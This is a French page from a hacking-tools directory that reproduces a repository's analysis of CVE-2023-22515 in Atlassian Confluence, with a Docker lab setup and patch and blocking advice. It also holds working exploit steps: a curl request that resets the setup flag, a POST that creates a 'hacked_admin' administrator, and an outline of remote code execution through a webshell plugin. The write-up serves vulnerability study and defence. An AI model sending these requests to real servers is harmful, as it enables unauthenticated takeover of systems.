Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-22515 — Analyse détaillée et preuve de concept d'exploitation pour CVE-2023-22515, une vulnérabilité critique de contrôle d'accès cassé dans Atlassian Confluence Data Center et Server, permettant la création non authentifiée de comptes administrateur et une potentielle exécution de code à distance. | Kitploit
Outils/GitHubGitHub/dkq-k/cve-2023-22515
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Analyse détaillée et preuve de concept d'exploitation pour CVE-2023-22515, une vulnérabilité critique de contrôle d'accès cassé dans Atlassian Confluence Data Center et Server, permettant la création non authentifiée de comptes administrateur et une potentielle exécution de code à distance.

Partager

CVE-2023-22515: Rapport d'analyse de la vulnérabilité d'élévation de privilèges dans Confluence Data Center & Server

1. Vue d'ensemble (Overview)

CVE-2023-22515 est une vulnérabilité critique de Contrôle d'accès brisé (Broken Access Control) découverte dans les produits Atlassian Confluence Data Center et Server. Un attaquant non authentifié peut réactiver à distance le processus de configuration initiale du serveur, puis créer un nouveau compte administrateur pour prendre complètement le contrôle du système.

  • CVE ID: CVE-2023-22515
  • CVSS Score: 10.0 (Critical)
  • Versions affectées : 8.0.0 ~ 8.5.1 (à l'exception de certaines versions)

2. Analyse détaillée de la vulnérabilité (Vulnerability Analysis)

Cause racine (Root Cause)

Le cœur de cette vulnérabilité réside dans une validation insuffisante entre le mécanisme de liaison de paramètres du framework XWork2 et la logique de traitement des actions de Confluence.

Un attaquant peut manipuler la valeur de bootstrapStatusProvider.applicationConfig.setupComplete à via un paramètre d'URL. Cette propriété est un indicateur important pour déterminer si Confluence a terminé l'installation et la configuration.

false
root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

En envoyant cette requête, le serveur considère en mémoire que la configuration n'est pas terminée. Cela ne modifie pas le fichier de configuration permanent (confluence.cfg.xml), mais change l'état lors de l'exécution, permettant de contourner le contrôle d'accès.

Mécanisme d'attaque (Attack Mechanism)

  1. Réinitialisation de l'état de configuration : L'attaquant accède à des points de terminaison publics comme /server-info.action en passant le paramètre bootstrapStatusProvider.applicationConfig.setupComplete=false.
  2. Contournement du contrôle d'accès : Le serveur se considère désormais en état "d'installation", donc les restrictions d'accès aux pages d'administration sous /setup/* sont levées.
  3. Création d'un compte administrateur : L'attaquant accède à /setup/setupadministrator.action et crée un nouveau compte administrateur système.
  4. Prise de contrôle du système : En se connectant avec le compte administrateur créé, il obtient tous les privilèges. Cela permet des actions malveillantes supplémentaires telles que le téléchargement de webshells, l'exfiltration de données, le déploiement de ransomwares, etc.

3. Reproduction de la vulnérabilité (Reproduction)

Mise en place de l'environnement (Environment Setup)

Nous avons mis en place un serveur Confluence vulnérable (version 8.5.1) en utilisant Docker.

  • Docker Image: atlassian/confluence-server:8.5.1
  • Database: PostgreSQL 14

docker-compose.yml (résumé):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... DB 설정 ...

Exécution de l'exploit (Exploitation)

Pour éviter les problèmes de dépendances Python, nous avons écrit et exécuté un PoC sous forme de script Bash utilisant curl.

Flux de l'exploit :

  1. Reset Setup Status:

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    Résultat : Une réponse de redirection HTTP 302 est retournée, confirmant que l'état de configuration terminée a été réinitialisé en interne.

  2. Create Administrator:

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    Résultat : Cette tentative de création du compte hacked_admin a été effectuée, et par la suite, il est possible d'accéder à la page de connexion avec ce compte.

4. Mesures d'atténuation (Mitigation)

Application du correctif (Patch)

Il est nécessaire de mettre à jour immédiatement vers la dernière version fournie par Atlassian.

  • Versions corrigées : 8.3.3, 8.4.3, 8.5.2 et ultérieures

Mesures de contournement temporaires (Workaround)

Si le correctif n'est pas possible, l'accès aux points de terminaison /setup/* doit être bloqué au niveau réseau (équilibreur de charge, WAF, proxy inverse, etc.).

  • URL à bloquer : /setup/*

6. Attaque avancée : Scénario RCE (Remote Code Execution)

Aperçu

Un attaquant ayant obtenu des privilèges d'administrateur via CVE-2023-22515 peut passer à l'étape d'exécution de commandes système (RCE).

Chaîne d'attaque (Attack Chain)

  1. Création d'un compte administrateur (CVE-2023-22515) : Obtenir les privilèges d'administrateur système comme décrit précédemment.
  2. Astuce de finalisation de configuration : Si le serveur est bloqué en 'Mode Setup', forcer la finalisation de la configuration via /setup/finishsetup.action (nécessite un contournement de licence) ou naviguer dans les menus d'administration accessibles en utilisant une session existante.
  3. Téléchargement d'un plugin malveillant :
    • Menu : Confluence Administration -> Manage Apps -> Upload App
    • Fichier : un fichier .jar contenant des classes Java malveillantes.
  4. Exécution de commandes :
    • Accéder à l'URL fournie par le plugin téléchargé (par ex. /plugins/servlet/webshell?cmd=id) pour exécuter des commandes système.

Limites de l'environnement de reproduction actuel

Notre environnement de test (Docker) ne dispose pas d'une licence Confluence valide, ce qui empêche de terminer l'étape de configuration initiale. Par conséquent, bien que la demande de création de compte administrateur ait réussi (302 Redirect), l'accès ultérieur au menu des plugins et l'exécution réelle de RCE ont été limités. Dans un environnement de production réel, une licence est enregistrée, donc la RCE est possible immédiatement sans ces limitations.

7. Conclusion (Conclusion)

CVE-2023-22515 est une vulnérabilité très dangereuse permettant d'obtenir des privilèges d'administrateur sans authentification. L'attaque est possible en manipulant simplement un paramètre d'URL, ce qui rend la difficulté d'attaque très faible. Par conséquent, les organisations utilisant ces versions doivent appliquer immédiatement un correctif ou des mesures d'atténuation.

Télécharger l’outil